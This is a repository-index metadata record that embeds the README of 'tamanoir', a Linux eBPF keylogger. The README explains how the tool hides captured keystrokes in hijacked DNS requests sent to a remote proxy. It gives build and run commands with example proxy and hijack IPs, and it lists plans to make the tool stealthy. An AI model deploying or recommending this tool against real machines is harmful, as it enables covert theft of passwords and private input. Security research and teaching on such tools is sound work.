{"id":22353433,"url":"https://github.com/pythops/tamanoir","last_synced_at":"2025-02-26T17:09:18.701Z","repository":{"id":266247053,"uuid":"875383720","full_name":"pythops/tamanoir","owner":"pythops","description":" A KeyLogger using eBPF 🐝","archived":false,"fork":false,"pushed_at":"2025-01-13T21:48:16.000Z","size":313,"stargazers_count":195,"open_issues_count":2,"forks_count":12,"subscribers_count":4,"default_branch":"main","last_synced_at":"2025-02-19T16:12:12.435Z","etag":null,"topics":["aya","ebpf","hacking","keylogger","linux","rust","security"],"latest_commit_sha":null,"homepage":"","language":"Rust","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"gpl-3.0","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/pythops.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":".github/FUNDING.yml","license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null},"funding":{"github":"pythops"}},"created_at":"2024-10-19T20:34:40.000Z","updated_at":"2025-02-16T02:52:13.000Z","dependencies_parsed_at":"2025-01-15T11:11:31.903Z","dependency_job_id":"c0b93051-93e0-4d80-aa2b-fb8b11328e84","html_url":"https://github.com/pythops/tamanoir","commit_stats":null,"previous_names":["pythops/tamanoir"],"tags_count":1,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pythops%2Ftamanoir","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pythops%2Ftamanoir/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pythops%2Ftamanoir/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pythops%2Ftamanoir/manifests","owner_url":"https://repos.ecosyste.ms/ap
i/v1/hosts/GitHub/owners/pythops","download_url":"https://codeload.github.com/pythops/tamanoir/tar.gz/refs/heads/main","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":240898276,"owners_count":19875151,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["aya","ebpf","hacking","keylogger","linux","rust","security"],"created_at":"2024-12-04T13:08:26.912Z","updated_at":"2025-02-26T17:09:18.680Z","avatar_url":"https://github.com/pythops.png","language":"Rust","readme":"\u003cdiv align=\"center\"\u003e\n  \u003ch1\u003e Tamanoir \u003cbr\u003e A KeyLogger using eBPF 🐝 \u003c/h1\u003e\n  \u003cimg src=\"https://github.com/user-attachments/assets/47b8a0ef-6a52-4e2d-8188-e77bb9e98d79\" style=\"width: 40%; height: 40%\"\u003c/img\u003e\n  \u003cp\u003e\u003csmall\u003e\n    \u003ci\u003e\n      A large anteater of Central and South America, Myrmecophaga tridactyla\n    \u003c/i\u003e\n  \u003c/small\u003e\u003c/p\u003e\n\u003c/div\u003e\n\n## 💡Overview\n\n\u003cdiv align=\"center\"\u003e\n  \u003cimg src=\"https://github.com/user-attachments/assets/24f80020-9d60-4f2a-825b-ed56574dfb24\" \u003c/img\u003e\n\u003c/div\u003e\n\n1. Capture keystrokes and store them in a queue in the kernel.\n2. Intercept DNS requests and inject the captured keystrokes in the DNS payload, then redirect the request to the designated remote server acting as a DNS proxy.\n3. On the remote server, extract the keys from the DNS payload and send a valid DNS response.\n4. 
Intercept the response and modify its source address so the initial request will complete successfully.\n\n\u003cbr\u003e\n\n## 🚀 Setup\n\nYou need a Linux-based OS.\n\n### ⚒️ Build from source\n\nTo build from source, make sure you have:\n\n- [bpf-linker](https://github.com/aya-rs/bpf-linker) installed.\n- [Rust](https://www.rust-lang.org/tools/install) installed with `nightly` toolchain.\n\n#### 1. Build ebpf program\n\n```\ncd tamanoir-ebpf\ncargo build --release\n```\n\n#### 2. Build user space program\n\n```\ncargo build --release\n```\n\nThis will produce an executable file at `target/release/tamanoir` that you can copy to a directory in your `$PATH`\n\n### 📥 Binary release\n\nYou can download the pre-built binaries from the [release page](https://github.com/pythops/tamanoir/releases)\n\n\u003cbr\u003e\n\n## 🪄 Usage\n\n### Tamanoir\n\n```\nRUST_LOG=info sudo -E tamanoir \\\n              --proxy-ip \u003cDNS proxy IP\u003e \\\n              --hijack-ip \u003clocally configured DNS server IP\u003e \\\n              --layout \u003ckeyboard layout\u003e \\\n              --iface \u003cnetwork interface name\u003e\n```\n\nfor example:\n\n```\nRUST_LOG=info sudo -E tamanoir \\\n              --proxy-ip 192.168.1.75 \\\n              --hijack-ip 8.8.8.8 \\\n              --layout 0 \\\n              --iface wlan0\n```\n\nCurrently, there are two supported keyboard layouts:\n\n`0` : qwerty (us)\n\n`1` : azerty (fr)\n\n\u003cbr\u003e\n\n### DNS Proxy\n\nOn a remote host, make sure you have [docker](https://docs.docker.com/engine/install/) installed.\n\n#### 1. Build proxy image\n\n```\ncd proxy\ndocker build -t proxy .\n```\n\n#### 2. 
Run proxy\n\n\u003e [!NOTE]\n\u003e Make sure port 53 is available\n\n```\ndocker run --rm -it -p 53:53/udp -e PAYLOAD_LEN=8 proxy\n```\n\n\u003cbr\u003e\n\n## 🛠️TODO\n\n- [ ] Automatic discovery of the configured local dns server\n- [ ] Automatic discovery of the keyboard layout\n- [ ] Rewrite the DNS proxy in Rust\n- [ ] Make `Tamanoir` stealth (hide used ebpf maps and programs, process pid ...)\n\n\u003cbr\u003e\n\n## ⚠️ Disclaimer\n\n`Tamanoir` is developed for educational purposes only\n\n\u003cbr\u003e\n\n## ✍️ Authors\n\n[Badr Badri](https://github.com/pythops)\n\n[Adrien Gaultier](https://github.com/adgaultier)\n\n\u003cbr\u003e\n\n## ⚖️ License\n\nGPLv3\n","funding_links":["https://github.com/sponsors/pythops"],"categories":["Rust","Small Tools that Use Aya"],"sub_categories":["Aya-related talks"],"project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fpythops%2Ftamanoir","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fpythops%2Ftamanoir","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fpythops%2Ftamanoir/lists"}